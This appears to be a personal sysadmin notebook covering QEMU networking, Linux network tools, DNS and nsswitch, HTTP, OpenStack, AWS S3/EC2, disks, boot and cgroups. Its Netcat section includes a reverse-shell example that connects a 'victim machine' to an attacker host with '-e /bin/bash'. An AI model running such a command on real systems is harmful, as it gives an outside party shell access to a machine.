Keyboard shortcuts

Press or to navigate between chapters

Press S or / to search in the book

Press ? to show this help

Press Esc to hide this help

Qemu

CLI

To run Qemu in terminal we can use -nographic or -display curses.

Resources

Qemu images

Qumu disk images

There two types of images: - raw: faster, static and take the whole allocated space, can be created with dd or fallocate. - qcow: less performant, dynamic copy-on-write and supports snapshoting. Does not play well with Btrfs, COW on COW.

  • Overlay storage images are a way to create images from other images.
  • Qemu images can be resized or converted to other formats with qemu-img.

GuestFS tools


qemu-img reference

Qemu networking

VirtualBox VS Qemu Networking

The following are VB Networking modes and how we can implement them in Qemu:

  • Not Attached: in qemu this is done by specifying -nic none.
  • NAT: this is the default for VB, and it is the way Qemu user networking(SLIRP) is setup.
    • The hypervisor NAT's the traffic from the guest to the outside world.
    • By default the host is accessible from the guest in the address 10.0.2.2.
    • The guest is not accessible from the host by default. Access can be achieved through Port forwarding.
    • -device e1000,netdev=net0 -netdev user,id=net0,hostfwd=tcp::2222:22
    • In Qemu's usermode networking, a userspace networking stack is loaded in the qemu process. It is a standlone implementation of ip, tcp, udp, dhcp and tftp ...
  • NAT Networks: This create a network similar to a home router, the services in the network can reach each other and internet, but they can be reached by outer hosts.
    • This is done using using Bridges and TAP interfaces.
    • We create a bridge with a static IP address and we plug it into the VMs' nics, then we NAT from it. Finally we run dnsmasq on it to act as a DHCP and DNS server.
  • Bridged networking: This is the same as the previous but more flexible.
    • In Qemu the tap device is bridged to a physical network interface so the machines are accessible from the host network.
    • device virtio-net,netdev=network0 -netdev tap,id=network0,ifname=tap0,script=no,downscript=no
  • Internal networking: Same as bridged, but the VMs are not accessible from the host and vice versa.
    • This is achieved in Qemu by droping all the traffic to the bridge on the INPUT iptables chain.
    • iptables -I FORWARD -m physdev --physdev-is-bridged -j ACCEPT
    • We either need to assign static IPs or run a DHCP server in one of the VMs.
  • Host-only networking: Hybrid between Host-Only and Bridged, since the VMs can't be accessed by the machines in the host's network, but can be accessed by the hist itself.
    • In Qemu the bridge is created and assigned an IP, and no traffic destined to it is dropped. But it is not connected to any physical interface.
  • Generic networking: VDE networks.

More on Qemu networking in the Arch wiki. And more on VB Networking on their manual.

Qemu networking CLI options

  • Qemu provide two different entities to configure networking for a vm:
    1. The frontend: The nic that the guest sees, it can either be a virtualized network card (e1000) or a paravirtualized device (virtio-net)
    2. The backend: The interface used by Qemu to exchange network packets with the outside world (other vms, the host internet ...).
  • There are 3 options to create network entities -nic, -netdev and -net.
  • -net can either create a frontend or a backend.
    • All frontends and backends created using -net are connected to a hub (previously named vlan). This way all of them will recieve each other's packets.
    • It can not use vhost acceleration.
    • Qemu -net is deprecated in favor of -device + -netdev or -nic for fast and less verbose network configurations.
  • -netdev can only create backends and needs to be coupled with -device.
    • It does not create a shared hub. and every nic is connected to its backend only, which mean packets are not accessible between interfaces.
    • We still can connect to hub using -netdev hubport, however the use of a hub is not required anymore for most usecases.
    • -device can only be used with plugable NICs. Boards with on-board NICs can't be configured with -device.
  • -nic can create both frontends and backends at the same time.
    • It is easier to use than -netdev and can configure onboard NICs, and does not place a hub between interfaces.

More information here

More on Qemu networking

  • In unpriviliged setups, qemu VMs running using the usermode networking can access each other using sockets.

More on Qemu networking and socket mode

Networking

Linux Networking

Network interface Management

1. Wired Interfaces

There are two main commands addr (Layer 3) and link (Layer 2). They have a CRUD interface, can check the help using ip <command> help. ip commands replaced ifconfig commands

  • ip l CRUD:
ip link show
ip link show dev <interface-name>
ip link add [link <dev-name>] name <interface-name> type <link-type> # Add a virtual link
ip link del dev <interface-name>
  • ip a CRUD:
ip addr show
ip addr show dev <interface-name>
ip addr add dev <interface-name> <ip-address>/<mask>
ip addr del dev <interface-name> <ip-address>/<mask>

2. Wireless Interfaces

iw replaced iwconfig and iwlist. iw dev is used to manage the wireless interfaces, scan for available networks, link to a Network (using SSID) etc ... iw phy manages the hardware device.

iw dev wlan0 link # information about the link 
iw dev wlan0 info # information about the interface
iw dev wlan0 scan
iw dev wlan0 connect <SSID>

3. ARP protocol

ip [-s] neigh is used to display the neighbors list aka arp cache/table (-s to have verbose statistics). ip n offers a CRuS interface to manage the ARP cache

ip n add <ip-addr> lladr <mac-addr> dev <interface-name>
ip n del <ip-addr> dev <interface-name>
ip n show dev <interface-name>
ip n replace <ip-addr> lladr <mac-addr> dev <interface-name> # Replace or ADD a MAC for the IP address

Notes

  • Difference between link, device and interface Source: In Linux context they all refer to Kernel's netdev but in networking they can mean different things:
    • Link: the actual circuit, path, and/or cable between ports.
    • Device: either the entire system, or the blob within it that creates the electrical (optical) signal.
    • Interface: the logical middleground between the two, often in the context of the OS (eth0, f0/0, etc.)

TCP/IP

1. Routing

Iproute handles routing the ip route command.

ip route add <network-ip-address>/mask via <router-ip-address> dev <interface-name>
ip route del <network-ip-address>/mask via <router-ip-address> dev <interface-name>
ip route default via <default-gateway-ip>
ip route add prohibit <network-ip-address>/mask # blocks route and sends back an ICMP message
ip route add blackhole <network-ip-address>/mask # blocks route silently

2. TCP ports

Iproute replaces netstat with ss

ss -lntp 
# -l: listening sockets, -n: numerical port numbers, and hostnames -t: tcp, p: show processes using the socket

lsof is very useful too! it shows the open files per user, per process.

lsof -i4 # list all IPv4 network
lsof -p <pid> # list by pid
lsof -u <username> # list by user ^ for negation
lsof -i <protocol>:<port> # list by port
lsof <file-path> # process opening a file

3. TCPDump

TCP dump performs packet monitoring and capture on any Network interface (even Bleutooth, loopback ....)

tcpdump -D # list interfaces available for capture
tcpdump -i <interface-name> -c <count> -w <file-path> # capture packets on an interface and save the results to a file

TCPDump Cheatsheet

OptionDescription
-DList interfaces available for capture
-i eth0Capture packets on an interface or all interfaces (any)
-cCapture a specified count of packets
-nDisable hostname resolution
-nnDisable protocol, port, and hostname resolution
-i any protocolCapture packets by protocol on all interfaces
-i any host 10.0.2.18Capture packets by a host on all interfaces
-i any src/dst 10.0.2.10Capture packets by source or destination address on all interfaces
-AView packet content in ASCII
-XView packet content in hex and ASCII
-w file_name.pcapSave the output of tcpdump to a file
-r file_name.pcapRead packets from a file

4. Port Scanning with Nmap

Nmap is a port scanner. It supports many scanning modes.

nmap -iL <host-file> # scan all hosts in a file
nmap -sn <hostname> # Ping scan, host discovery
nmap -Pn <hostname> # Skips host discovery, Only scan the ports.
nmap -r <hostname> # Scan consecutively, don't randomize
nmap -F <hostname> # Perform a fast scan, only common ports
nmap -p <port1,...,portn> <hostname> # select ports to scan
nmap -sU/-sP <hostname> # scan UDP or TCP (default) ports only
nmap -sS <hostname> # TCP Syn scan (stealthy), quick and un-intrusive. start TCP handshake and never end it.
nmap -sT <hostname> # TCP connect Scan.

5. Interacting with remote hosts

ping send an ICMP packet to a destination IP. Very useful for troubleshooting and discovery.

Ping Cheatsheet

OptionDescription
hostnameSend a stream of ICMP packets to a hostname
10.0.2.10Send a stream of ICMP packets to an IP address
-c 5 10.0.2.10Send a specified amount of packets
-s 100 10.0.2.10Alter the size of the packets
-i 3 10.0.2.10Change the interval for sending packets
-q 10.0.2.10Only show the summary information
-w 5 10.0.2.10Set a timeout of when to stop sending packets
-f 10.0.2.10Flood ping. Send packets as soon as possible.
-p ff 10.0.2.10Fill a packet with data. ff fills the packet with ones
-b 10.0.2.10Send packets to a broadcast address
-t 10 10.0.2.10Limit the number of network hops
-v 10.0.2.10Increase verbosity

6. Netcat

Netcat is also very useful in this regard, since it writes and reads data across networks.

nc -l <port> # Listen on specific port
nc -u -l <port> # listen on an UDP port
nc -v -z <ip-address> <port> # Report connection status

# Reverse Shell
nc -lvp 4444 # On Attacker machine open a connection
nc <attacker-hostname> 4444 -e /bin/bash # On the victim machine

# File Transfer
nc -lvp 4444 > text.txt
nc <hostname> 4444 < test.txt

# Send GET Request to a webserver
printf "GET / HTTP/1.0\r\n\r\n" | nc <hostname> <port>

Network Configurations

1. RHEL Based systems (Old)

The config files used to live in /etc/sysconfig/network-scripts

OptionDescription
TYPE=EthernetThe type of network interface device (e.g., Ethernet, Wi-Fi)
BOOTPROTO=noneSpecify boot protocol (none, dhcp, bootp)
DEFROUTE=yesSpecify default route for IPv4 traffic (yes, no)
IPV4_DEFROUTE=yesSpecify default route for IPv6 traffic (yes, no)
IPV4_FAILURE_FATAL=noDisable the device if the configuration fails (yes, no)
IPV6_FAILURE_FATAL=noDisable the device if the configuration fails (yes, no)
IPV6INIT=yesEnable or disable IPv6 on the interface (yes, no)
IPV6_AUTOCONF=yesEnable or disable autoconf configuration (yes, no)
NAME=eth0Specify a name for the connection
UUID=...Specify the unique identifier for the device
ONBOOT=yesActivate interface on boot (yes, no)
HWADDR=00:00:00:00:00:00Specify the MAC address for the interface
IPADDR=10.0.1.10Specify the IPv4 address.
PREFIX=24Specify the network prefix.
NETMASK=255.255.255Specify the netmask.
GATEWAY=10.0.1.1Specify the gateway.
DNS1=192.168.123.3Specify a DNS server.
DNS2=192.168.123.2Specify another DNS server.
PEERDNS=yesModify the /etc/resolv.conf file (yes/no).

2. Debian Based Systems (Old)

All the network interfaces configurations go into /etc/network/interfaces, with an /etc/network/interfaces.d. Interfaces with lines beginning with auto are brought up on system startup.

3. Distro agnostic config files

In addition to the distro related network configuration files, here are the most common remaining ones:

  • /etc/hosts: Name to IP Address associations
  • /etc/resolv.conf: DNS resolver configuration
  • `/etc/sysconfig/network: Global network settings
  • /etc/nsswitch.conf: The Name Service Switch config file, used to determine Sources from which to obtain name-service information, and their order.
  • /etc/hostname: holds the machine hostname (can be set/shown using hostname or hostnamectl)
  • /etc/hosts.deny and /etc/hosts.allow: Allow or block access to certain services from remote clients (Can use ALL to block or allow all). For example to only allow hosts from 10.0.3.* network to connect to our host via SSH we can do the following
# /etc/hosts.deny
sshd : ALL

# /etc/hosts.allow
sshd : 10.0.3.*

4. Network Manager

  • Network Manager vs ifcfg-* Options
nmcli con modifcfg-* filePurpose
ipv4.method manualBOOTPROTO=noneSet a static IPv4 address
ipv4.method autoBOOTPROTO-dhcpAutomatically set IPv4 address using DHCP
ip4ipv4.address "192.168.0.10/24"IPADDR=192.168.0.10 PREFIX=24
gw4ipv4.gateway 192.168.0.1GATEWAY=192.168.0.1
ipv4.dns 8.8.8.8DNS1-8.8.8.8Specify DNS server
autoconnect yesONBOOT=yesAutomatically activate this connection on boot
con-name eth0NAME=eth0Specify the name of the connection
ifname eth0DEVICE-eth0Specify the interface for the connection
802-3-ethernet.mac-address ADDRHWADDR=...Specify the MAC address of the interface for the connection
  • nmcli commands
PurposeCommand
nmcli dev statusShow the status of all network interfaces
nmcli con showList all connections
nmcli con show nameList the current settings for the connection name
nmcli con add con-name name ...Add a new connection named name
nmcli con mod name ...Modify a connection
nmcli con reloadReload the network configuration files
nmcli con up name 1 nmcli con down nameActivate or deactivate a connection
nmcli dev dis devDeactivate and disconnect the current connection
nmcli con del nameDelete the connection and its configuration file

Network Diagnostics and Troubleshooting

1. Traffic analysis with Traceroute and MTR

Traceroute tracks the route taken by packets from source to destination. The traceroutecommand uses UDP packet by default, but can use ICMP ECHO -I or TCP SYN -T for probing. Tracepath is modern alternative with less fancy options.

traceroute -n -q 2 -I www.google.com # Don't resolve hostname, use ICMP and send only 2 probes per host.

MTR on the other hand use ICMP ECHO by default, but this can be changed using -T (TCP) and -u (UDP). ALso MTR is a TUI and record more statistics.

mtr -r -c 3 -f 4 www.google.com # Generate a report instead of RT interface (3 runs, start as 6th hop).
mtr -run4 -c 3 www.google.com # Only non resolved IPv4 addresses, use UDP for probes.
mtr -w -c 3 www.google.com # Generate a wise report instead (non truncated IP addresses/hostnames)

2. Network logs

Debian Based systems use /var/log/syslog for logging system logs, while RHEL based use /var/log/messages.

Another source for logs is Systemd logs, which are stored in a binary format and can be consulted using the journalctl utility. In Addition to all of that we have dmesg which read messages from the Kernel ring buffer.

Notes

  • Traceroute and MTR are very useful to troubleshoot and diagnose any network traffic problems.
  • Changing between UDP, ICMP and TCP probes can be helpful to avoid routers filtering.
  • The kernel ring buffer is a data structure in the Linux kernel that stores log messages generated by the kernel. It is a cyclic buffer that holds the most recent log messages and can be read through the /proc/kmsg file or by using the dmesg command. The kernel ring buffer provides a quick and efficient way for system administrators to diagnose and troubleshoot problems with the Linux system.

Resources

DNS

DNS Resolution process

  1. DNS resolver look in its DNS cache
  2. DNS resolver breaks iduoad.com to [., com., iduoad.com.]
  3. The DNS resolution start at . which is called root domain. Its ip addresses are already know to the DNS resolver. => returns(address of the authoritative nameserver of .)
  4. DNS resolver queries the root domain nameserver to find the DNS servers to respond with details on com.. => returns(address of the authoritative nameserver of com.)
  5. DNS resolver queries the com. authoritative nameserver to get authoritative nameserver for iduoad.com.
  6. DNS resolver queries the authoritative nameserver for iduoad.com and gets the latter's IP address.

A DNS request using dig utility:

# To visualize the entire process we run the following command
dig +trace iduoad.com

A DNS response looks like the following:

iduoad.com.		1799	IN	CNAME	iduoad.netlify.app.
# REQUEST    TTL(for cache)    IN    Query TYPE    Response

DNS and Layer 4 protocols

Multiplexing/Demultiplexing and UDP in linux

  • Multiplexing: When a client makes a DNS request, after filling the necessary application payload, it passes the payload to the kernel via sendto system call.
  • Demultiplexing: When the kernel on server side receives the packet, it checks the port number and queues the packet to the application buffer of the DNS server process which makes a recvfrom system call and reads the packet.
  • UDP is one of the simplest transport layer protocol and it does only multiplexing and demultiplexing. Another common transport layer protocol TCP does a bunch of other things like reliable communication, flow control and congestion control...

TCP/UDP throughput and Kernel buffer size

  • If the underlying network is slow, and the UDP layer can't queue packets down to the Network Layer. sendto syscall will hang until the kernel finds some of its buffer freed up. Increasing write memory buffer values using sysctl variables net.core.wmem_max and net.core.wmem_default provides some cushion to the application from the slow network.
  • Same thing happens in the server side. If the receiver process is slow (slower than the Kernel), the kernel has to drop packets which can't queue due to the buffer being full. Since UDP doesn’t guarantee reliability these dropped packets can cause data loss unless tracked by the application layer. Increasing sysctl variables rmem_default and rmem_max can provide some cushion to slow applications from fast senders.

DNS Resolution in Linux

  1. When we head into a website. The browser first looks if the domain is already stored in its DNS cache.
  2. If the domain name does not exist in the browser's DNS cache, the browser calls the gethostbyname syscall.
  3. Linux looks in /etc/nsswitch.conf to know the order it will follow when trying to resolve the domain name to the ip address.
  4. Let's say the NSS file contains the following entry hosts: files dns.
  5. The OS will look in /etc/hosts file first for match of the domain name.
  6. If none is found in the hosts file, it will use nss-dns plugin to make a DNS request to the DNS resolvers listed in /etc/resolv.conf (in order from top to bottom).

The DNS resolvers are populated by DHCP or statically configured by an administrator.

nsswitch.conf file

The /etc/nsswitch.conf file is used to configure which services are to be used to determine information such as hostnames, password files, and group files.

An example of the /etc/nsswitch.conf

# Name Service Switch configuration file.
# See nsswitch.conf(5) for details.

passwd: files systemd
group: files [SUCCESS=merge] systemd
shadow: files systemd
gshadow: files systemd

publickey: files

hosts: mymachines resolve [!UNAVAIL=return] files myhostname dns
networks: files

protocols: files
services: files
ethers: files
rpc: files

netgroup: files

The syntax is the following:

database_name: (service_specifications...[STATUS=ACTION])
  • database_name: is the database name we will be looking for.
  • service_specification: where we'll be looking. Depend on the presence of shared libraries. (e.g files, db, ldap, winbind ...)
  • STATUS: a resulting status for service_specification if it occurs ACTION is taken.

In the previous example:

  • for passwd, group, shadow and gshadow the system will look in the files first then it will fallback to systemd.
  • for group if the lookup in the files succeeds, the processing will continue to systemd and will merge the member list of the already found groups will be merged together.
  • for hosts it will use mymachines plugin, then resolve. If resolve is available it will return (stop the lookup) otherwise it will continue to files, myhostname and finally dns.
  • for other services it will use files.

NSS Plugins

There are many NSS (Name Service Switch) plugins that are used to resolve names to ips. Here are some examples:

  • nss-mymachines: provides hostname resolution for the names of containers running locally that are registered with systemd-machined.service.
  • nss-myhostname: provides hostname resolution for the locally configured system hostname as returned by gethostname.
  • nss-resolve: resolves hostnames via the systemd-resolved local network name resolution service. It replaces the nss-dns plug-in module that traditionally resolves hostnames via DNS.
  iduoad.com.		1799	IN	CNAME	iduoad.netlify.app.
  # REQUEST    TTL(for cache)    IN    Query TYPE    Response

Linux DNS utilities: dig vs nslookup

  • dig uses the OS resolver libraries. nslookup uses is own internal ones.
  • Internet Systems Consortium (ISC) has been trying to get people to stop using nslookup.
  • nslookup was considered deprecated until BIND 9.9.0a3 release.
  • Source in StackOverflow thread #❔

DNS applications

HTTP

HTTP/1.0 vs HTTP/1.1 vs HTTP/2.0

  • HTTP/1.0 uses a new TCP connection for each request.
  • HTTP/1.1 can only have one inflight request in an open TCP connection but connections can be reused for multiple requests one after another.
  • HTTP/2.0 can have multiple inflight requests on the same TCP connection.
  # This will exit after this single request.
  telnet iduoad.com 80
  GET / HTTP/1.0
  HOST:iduoad.com
  USER-AGENT: curl

  # We can reuse the same connection for multiple requests.
  telnet iduoad.com 80
  GET / HTTP/1.1
  HOST:iduoad.com
  USER-AGENT: curl

  GET / HTTP/1.1
  HOST:iduoad.com
  USER-AGENT: curl

Cloud

Openstack

Installation

Kolla Ansible

Kolla ansible inventory consists of 5 groups:

  1. control
  2. compute
  3. network
  4. storage
  5. monitoring

source

Networking

Openstack requires at least 2 network interfaces, in Kolla they are created using:

  • network_interface: Not used on its own but most other services default to using it.

  • neutron_external_interface: Required by Neutron and used for flat networking and tagged vlans

  • Openstack networks are Layer 2.

A network is the central object of the Neutron v2.0 API data model and describes an isolated Layer 2 segment. In a traditional infrastructure, machines are connected to switch ports that are often grouped together into Virtual Local Area Networks (VLANs) identified by unique IDs. Machines in the same network or VLAN can communicate with one another but cannot communicate with other networks in other VLANs without the use of a router.

IP address in openstack

  • To create public ip address in openstack (floating ips) we use openstack floating ip create docs
  • To assign a new ip address to a machine we use openstack server add floating ip docs

Create a Test VM

openstack server create --flavor 1 --image cirros  --network <network-id>  test_vm

Networking

Creation

The Neutron workflow (when booting a VM instance)

  1. The user creates a network.
  2. The user creates a subnet and associates it with the network.
  3. The user boots a virtual machine instance and specifies the network.
  4. Nova interfaces with Neutron to create a port on the network.
  5. Neutron assigns a MAC address and IP address to the newly created port using attributes defined by the subnet.
  6. Nova builds the instance's libvirt XML file, which contains local network bridge and MAC address information, and starts the instance.
  7. The instance sends a DHCP request during boot, at which point, the DHCP server responds with the IP address corresponding to the MAC address of the instance

Deletion

  1. The user destroys the virtual machine instance.
  2. Nova interfaces with Neutron to destroy the ports associated with the instances.
  3. Nova deletes local instance data.
  4. The allocated IP and MAC addresses are returned to the pool.

Console

There are three remote console access methods commonly used with OpenStack:

  • novnc: An in-browser VNC client implemented using HTML5 Canvas and WebSockets
  • spice: A complete in-browser client solution for interaction with virtualized instances
  • xvpvnc: A Java client offering console access to an instance

Resources

AWS

AWS S3

General Overview

  • Object storage service for scalable, durable data storage.
  • 99.999999999% (11 9's) durability; 99.99% availability for most classes.
  • Unlimited storage; pay for usage (storage, requests, data transfer).
  • Global via multi-Region access; integrates with AWS services (EC2, Lambda, etc.).
  • Data Model:
    • Bucket – top-level container (unique name, global namespace)
    • Object – file + metadata
    • Key – full path to object within a bucket
  • There is no concept of directory in General-purpose S3.
  • Objects size is limited at 5GB objects with more than 5GB, must use "multi-part" upload.
  • Objects can have key-value pairs of Metadata and can have key-value tags (useful for security/lifecycles)

Storage Classes

ClassUse CaseDurabilityAvailabilityRetrieval TimeMinimum Storage DurationRetrieval Fee
S3 StandardFrequent access11 9s99.99%InstantNoneNo
S3 Intelligent-TieringUnknown access patterns11 9s99.9–99.99%InstantNoneNo
S3 Standard-IAInfrequent access11 9s99.9%Instant30 daysYes *
S3 One Zone-IANon-critical infrequent data11 9s99.5%Instant30 daysYes
S3 Glacier Instant RetrievalRarely accessed, quick retrieval11 9s99.9%ms90 daysYes
S3 Glacier Flexible RetrievalArchive w/ minutes–hours access11 9s99.99%minutes–hours90 daysYes
S3 Glacier Deep ArchiveLong-term cold storage11 9s99.99%hours (12h typical)180 daysYes

* : Retrieval is priced per GB.

Glacier Retrieval Options

TierFlexible RetrievalDeep Archive
Expedited1-5 minutesN/A
Standard3-5 hours12 hours
Bulk5-12 hours48 hours

Versioning

Lifecycle rule actions

Transition rule actions

  • (R1) Transition current versions of objects between storage classes.
    • Storage class transitions (Target storage class).
    • Days after object creation.
  • (R2) Transition noncurrent versions of objects between storage classes.
    • Storage class transitions.
    • Days after objects become noncurrent.
    • Number of newer versions to retain.

Deletion/Expiration rule actions

  • (R3) Expire current versions of objects.
    • Days after object creation
  • (R4) Permanently delete noncurrent versions of objects.
    • Days after objects become noncurrent
    • Number of newer versions to retain - Optional
  • (R5) Delete expired object delete markers or incomplete multipart uploads.
    • Delete expired object delete markers
    • Delete incomplete multipart uploads

Object deletion in a versioned bucket.

  • Delete an object with Show versions off -> Soft Delete -> Delete Marker created and is the current version shadowing all other versions.
  • Delete an object with Show versions on -> Permanent Delete for the chosen version -> if current is deleted the latest non current becomes current.
  • No promotion is supported. If an old version is wanted it should be copied over the latest version to create a new one with the content of the old one.
  • Lifecycle rule actions (R3) creates a delete marker and promotes it as current version.
  • The Expiration rule (R3) only applies to actual object versions, not delete markers.

Replication

Cross-Region Replication (CRR) vs Same-Region Replication (SRR)

FeatureDetails
PrerequisitesVersioning enabled on both source and destination
Replication scopeAll objects, prefix, or tags
What's replicatedNew objects after enabling, metadata, ACLs, tags
Not replicatedExisting objects (need S3 Batch), lifecycle actions, objects in Glacier/Deep Archive
Delete behaviorDelete markers can be replicated (optional), version deletes not replicated
Replication Time Control (RTC)99.99% within 15 minutes (SLA)
Batch ReplicationReplicate existing objects, failed replications

Two-way replication

  • Enable bidirectional replication between buckets
  • Prevents replication loops automatically

Security

Encryption at Rest

TypeKey ManagementPerformance
SSE-S3AWS managed (AES-256)No impact
SSE-KMSAWS KMS keysKMS API limits apply
SSE-CCustomer-provided keysCustomer manages keys
Client-sideEncrypt before uploadCustomer responsibility
  • Bucket default encryption: Applied to new objects without specified encryption
  • Enforce encryption: Use bucket policy to deny unencrypted uploads

Encryption in Transit

  • SSL/TLS (HTTPS) endpoints available
  • Enforce with bucket policy: aws:SecureTransport condition

Access Control

Priority order: Explicit DENY → Explicit ALLOW → Implicit DENY

MethodScopeUse Case
IAM PoliciesUser/role levelControl who can access S3
Bucket PoliciesBucket levelCross-account, public access, IP restrictions
ACLs (legacy)Bucket/object levelSimple permissions (avoid for new implementations)
Access PointsSubset of bucketSimplify permissions for shared datasets
Presigned URLsObject levelTemporary access without credentials

Block Public Access (BPA)

  • Four settings: Block public ACLs, Ignore public ACLs, Block public policies, Restrict public buckets
  • Applied at account or bucket level
  • Overrides bucket policies and ACLs

S3 Access Points

  • Named network endpoints with dedicated policies
  • Each access point has own DNS name
  • Supports VPC-only access
  • Simplifies managing access for shared datasets
  • Can restrict to specific VPC/VPCE

Event Notifications

Destinations: SNS, SQS, Lambda, EventBridge

Events:

  • Object created (PUT, POST, COPY, CompleteMultipartUpload)
  • Object deleted, restored
  • Replication events
  • Lifecycle events
  • Intelligent-Tiering changes

EventBridge advantages:

  • Advanced filtering (JSON rules)
  • Multiple destinations
  • Archive, replay events
  • 18+ AWS service targets

S3 Directory Buckets

  • New bucket type optimized for high performance
  • Used with S3 Express One Zone storage class
  • Single-digit millisecond latency
  • Up to 100GB/s throughput per bucket
  • Consistent hashing for predictable performance
  • Different naming: bucket-name--azid--x-s3

Performance

Multipart Upload

  • Required for objects > 5GB
  • Recommended for objects > 100MB
  • Parts: 1-10,000 parts, 5MB-5GB each (except last)
  • Benefits: Parallel uploads, pause/resume, start before knowing final size

Transfer Acceleration

  • Uses CloudFront edge locations
  • URL: bucket-name.s3-accelerate.amazonaws.com
  • Up to 50-500% faster for global users
  • Additional cost per GB
  • Test speed: AWS provides comparison tool

Performance Baseline

  • 3,500 PUT/COPY/POST/DELETE requests per second per prefix
  • 5,500 GET/HEAD requests per second per prefix
  • No limit on prefixes per bucket
  • Spread objects across prefixes for higher throughput

Byte-Range Fetches

  • Request specific byte ranges of object
  • Parallelize downloads
  • Resilient to network failures (retry smaller range)

S3 Select & Glacier Select

  • Retrieve subset of data using SQL
  • Filter at S3 side (up to 400% faster, 80% cheaper)
  • Works with CSV, JSON, Parquet
  • Supports compression (GZIP, BZIP2)

AWS EC2

EC2 instance types

Instance types names are composed of 4 components

  1. Instance family: The primary purpose of the instance.
  2. Generation: Version number, higher is newer, faster and usually cheaper for the same performance
  3. Additional capabilities: Information about Additional hardware capabilities. Like CPU brand, networking optimization, ...
  4. Service related prefix/suffix: The service owning the instance (e.g. rds, search, cache...)

Common Instance families

FamilyLetterWhat It's Optimized ForCommon Use Cases
General PurposeT (Burstable)Low baseline CPU with "burst" capability.Dev/test servers, blogs, small web apps.
General PurposeM (Main / Balanced)A balanced mix of CPU, Memory, and Network.Most applications, web servers, microservices.
Compute OptimizedC (Compute)High CPU power relative to memory (RAM).Batch processing, media transcoding, game servers.
Memory OptimizedR (RAM)A large amount of Memory relative to CPU.Databases (RDS), in-memory caches (ElastiCache).
Storage OptimizedI / D (I/O, Dense)Extremely high-speed local disk I/O.NoSQL databases, search engines (Elasticsearch).
Accelerated ComputingG / P (Graphics / Parallel)Hardware accelerators (GPUs).AI/Machine Learning, 3D rendering.

Common Additional capabilities

Capability LetterMeaning (Processor or Feature)
gGraviton (AWS's custom ARM processors)
aAMD processors
iIntel processors (often omitted if default)
dLocal NVMe Storage (fast "instance store" drives)
nNetwork Optimized (higher network bandwidth)
zHigh Frequency (very fast single-core CPU)

Linux

Storage

SSDs

Types of SSDs:

  • Form Factors:
    • 2.5" : looks like an HDD, slower, only supports SATA.
    • M.2: They come in few standard lengths (60mm, 80mm, 110mm), they support two interfaces:
      • SATA
      • PCIe (with and without NVMe support)
    • Add-in Card (AIC): Bigger than M.2 and operates over PCIe.
    • mSATA: looks like M.2, very small
    • U.2: Looks like 2.5" but they way faster. They are mainly used in the enterprise (Data centers)

NVME (Non-Volatile Memory Express):

  • is a super fast way to access SSDs and flash memory (NVM)
  • NVMe is not an interface and not a form factor (like SATA or PCIe) but a data transfer protocol
  • SSDs used SATA -> PCIe (lack of standard and features) -> NVMe

Lots of videos at the bottom of the page

PCIe

  • Each PCIe interface can be configured with 1 lane or multiple lanes x4 (x4, x8, x16 and x32).
  • Each PCIe Generation doubles the bandwidth
  • PCIe is backward compatible (The interface and card settle on the lower version)
  • PCIe cards can be plugged in slots with different number of lanes with the consequence of having less bandwidth or wasted lanes.

Hard disk drive interface

  • PATA(IDE) - SCSI: Old interfaces
  • SATA: Personal HDD, successor of PATA
  • SAS: Entreprise HDD, successor of SCSI
  • More and More

Disks and Partitions

partitioning formats

There are 2 known partioning formats:

  • MBR: 2TB is the limit disk size, can only create 4 primary partitions, the last one is set to extended partition in which we can create Logical partitions.
  • GPT: No disk limit, no limit for partition size. The partition table information is available in multiple locations to guard against corruption. GPT can also write a “protective MBR” which tells MBR-only tools that the disk is being used.

/dev/sd* vs /dev/disks:

  • The Linux kernel decides which device gets which name (/dev devices) on each boot. which can lead to to confusion and unwanted behavior.
  • /dev/disks has many subfolders that points to the partitions using other parameters besides the device name (label, id, uuid ...)

Boot

BIOS

The BIOS in modern PCs initializes and tests the system hardware components (Power-on self-test), and loads a boot loader from a mass storage device which then initializes a kernel. In the era of DOS, the BIOS provided BIOS interrupt calls for the keyboard, display, storage, and other input/output (I/O) devices that standardized an interface to application programs and the operating system. More recent operating systems do not use the BIOS interrupt calls after startup.[6]

Boot Sequence

  • System switched on, the power-on self-test (POST) is executed.
  • After POST, BIOS initializes the hardware required for booting (disk, keyboard controllers etc.).
  • BIOS launches the first 440 bytes (the Master Boot Record bootstrap code area) of the first disk in the BIOS disk order.
  • The boot loader's first stage in the MBR boot code then launches its second stage code (if any) from either:
    • Next disk sectors after the MBR, i.e. the so called post-MBR gap (only on a MBR partition table),
    • A partition's or a partitionless disk's volume boot record (VBR),
    • For GRUB on a GPT partitioned disk—a GRUB-specific BIOS boot partition (it is used in place of the post-MBR gap that does not exist in GPT).
  • The actual boot loader is launched.
  • The boot loader then loads an operating system by either chain-loading or directly loading the operating system kernel.

UEFI

UEFI launches EFI applications, e.g. boot loaders, boot managers, UEFI shell, etc. These applications are usually stored as files in the EFI system partition. Each vendor can store its files in the EFI system partition under the /EFI/vendor_name directory. The applications can be launched by adding a boot entry to the NVRAM or from the UEFI shell.

Boot Sequence

  • System switched on, the power-on self-test (POST) is executed.
  • After POST, UEFI initializes the hardware required for booting (disk, keyboard controllers etc.).
  • Firmware reads the boot entries in the NVRAM to determine which EFI application to launch and from where (e.g. from which disk and partition).
  • A boot entry could simply be a disk. In this case the firmware looks for an EFI system partition on that disk and tries to find an EFI application in the fallback boot path EFIBOOTBOOTx64.EFI (BOOTIA32.EFI on systems with a IA32 (32-bit) UEFI). This is how UEFI bootable removable media work.
  • Firmware launches the EFI application.
    • This could be a boot loader or the Arch kernel itself using EFISTUB.
    • It could be some other EFI application such as the UEFI shell or a boot manager like systemd-boot or rEFInd.
  • If Secure Boot is enabled, the boot process will verify authenticity of the EFI binary by signature.

Containers

Cgroups

Privileged access to Cgroups

CGroups can be accessed with various tools:

  • Systemd directives to set limits for services and slices.
  • Through the cgroup FS.
  • Through libcgroup binaries like cgcreate, cgexec and cgclassify.
  • The Rules engine daemon to automatically move certain users/groups/commands to groups (/etc/cgrules.conf and cgconfig.service).
  • Through other software like LXC.

Unprivileged access to Cgroups

Unprivileged users can divide resources using CGroups v2. memory and pids controllers are supported out of the box. cpu and io require delegation.

  • To delegate cgroup resources we should add the Delegate systemd property, and reboot
# /etc/systemd/system/user@1000.service.d/delegate.conf
[Service]
Delegate=cpu cpuset io

Experiment running Kubernetes in LXD

Try 1: Kubernetes storage support

Kubernetes filesystem support

The hardest issue with deploying Kubernetes on LXD/LXC containers is storage and filesystem support:

BTRFS

BTRFS does not work well with kubernetes, due to CAdvisor not playing well with BTRFS

ZFS

ZFS does not work as well on LXC and kubernetes, since it does not bad support for nested containers.

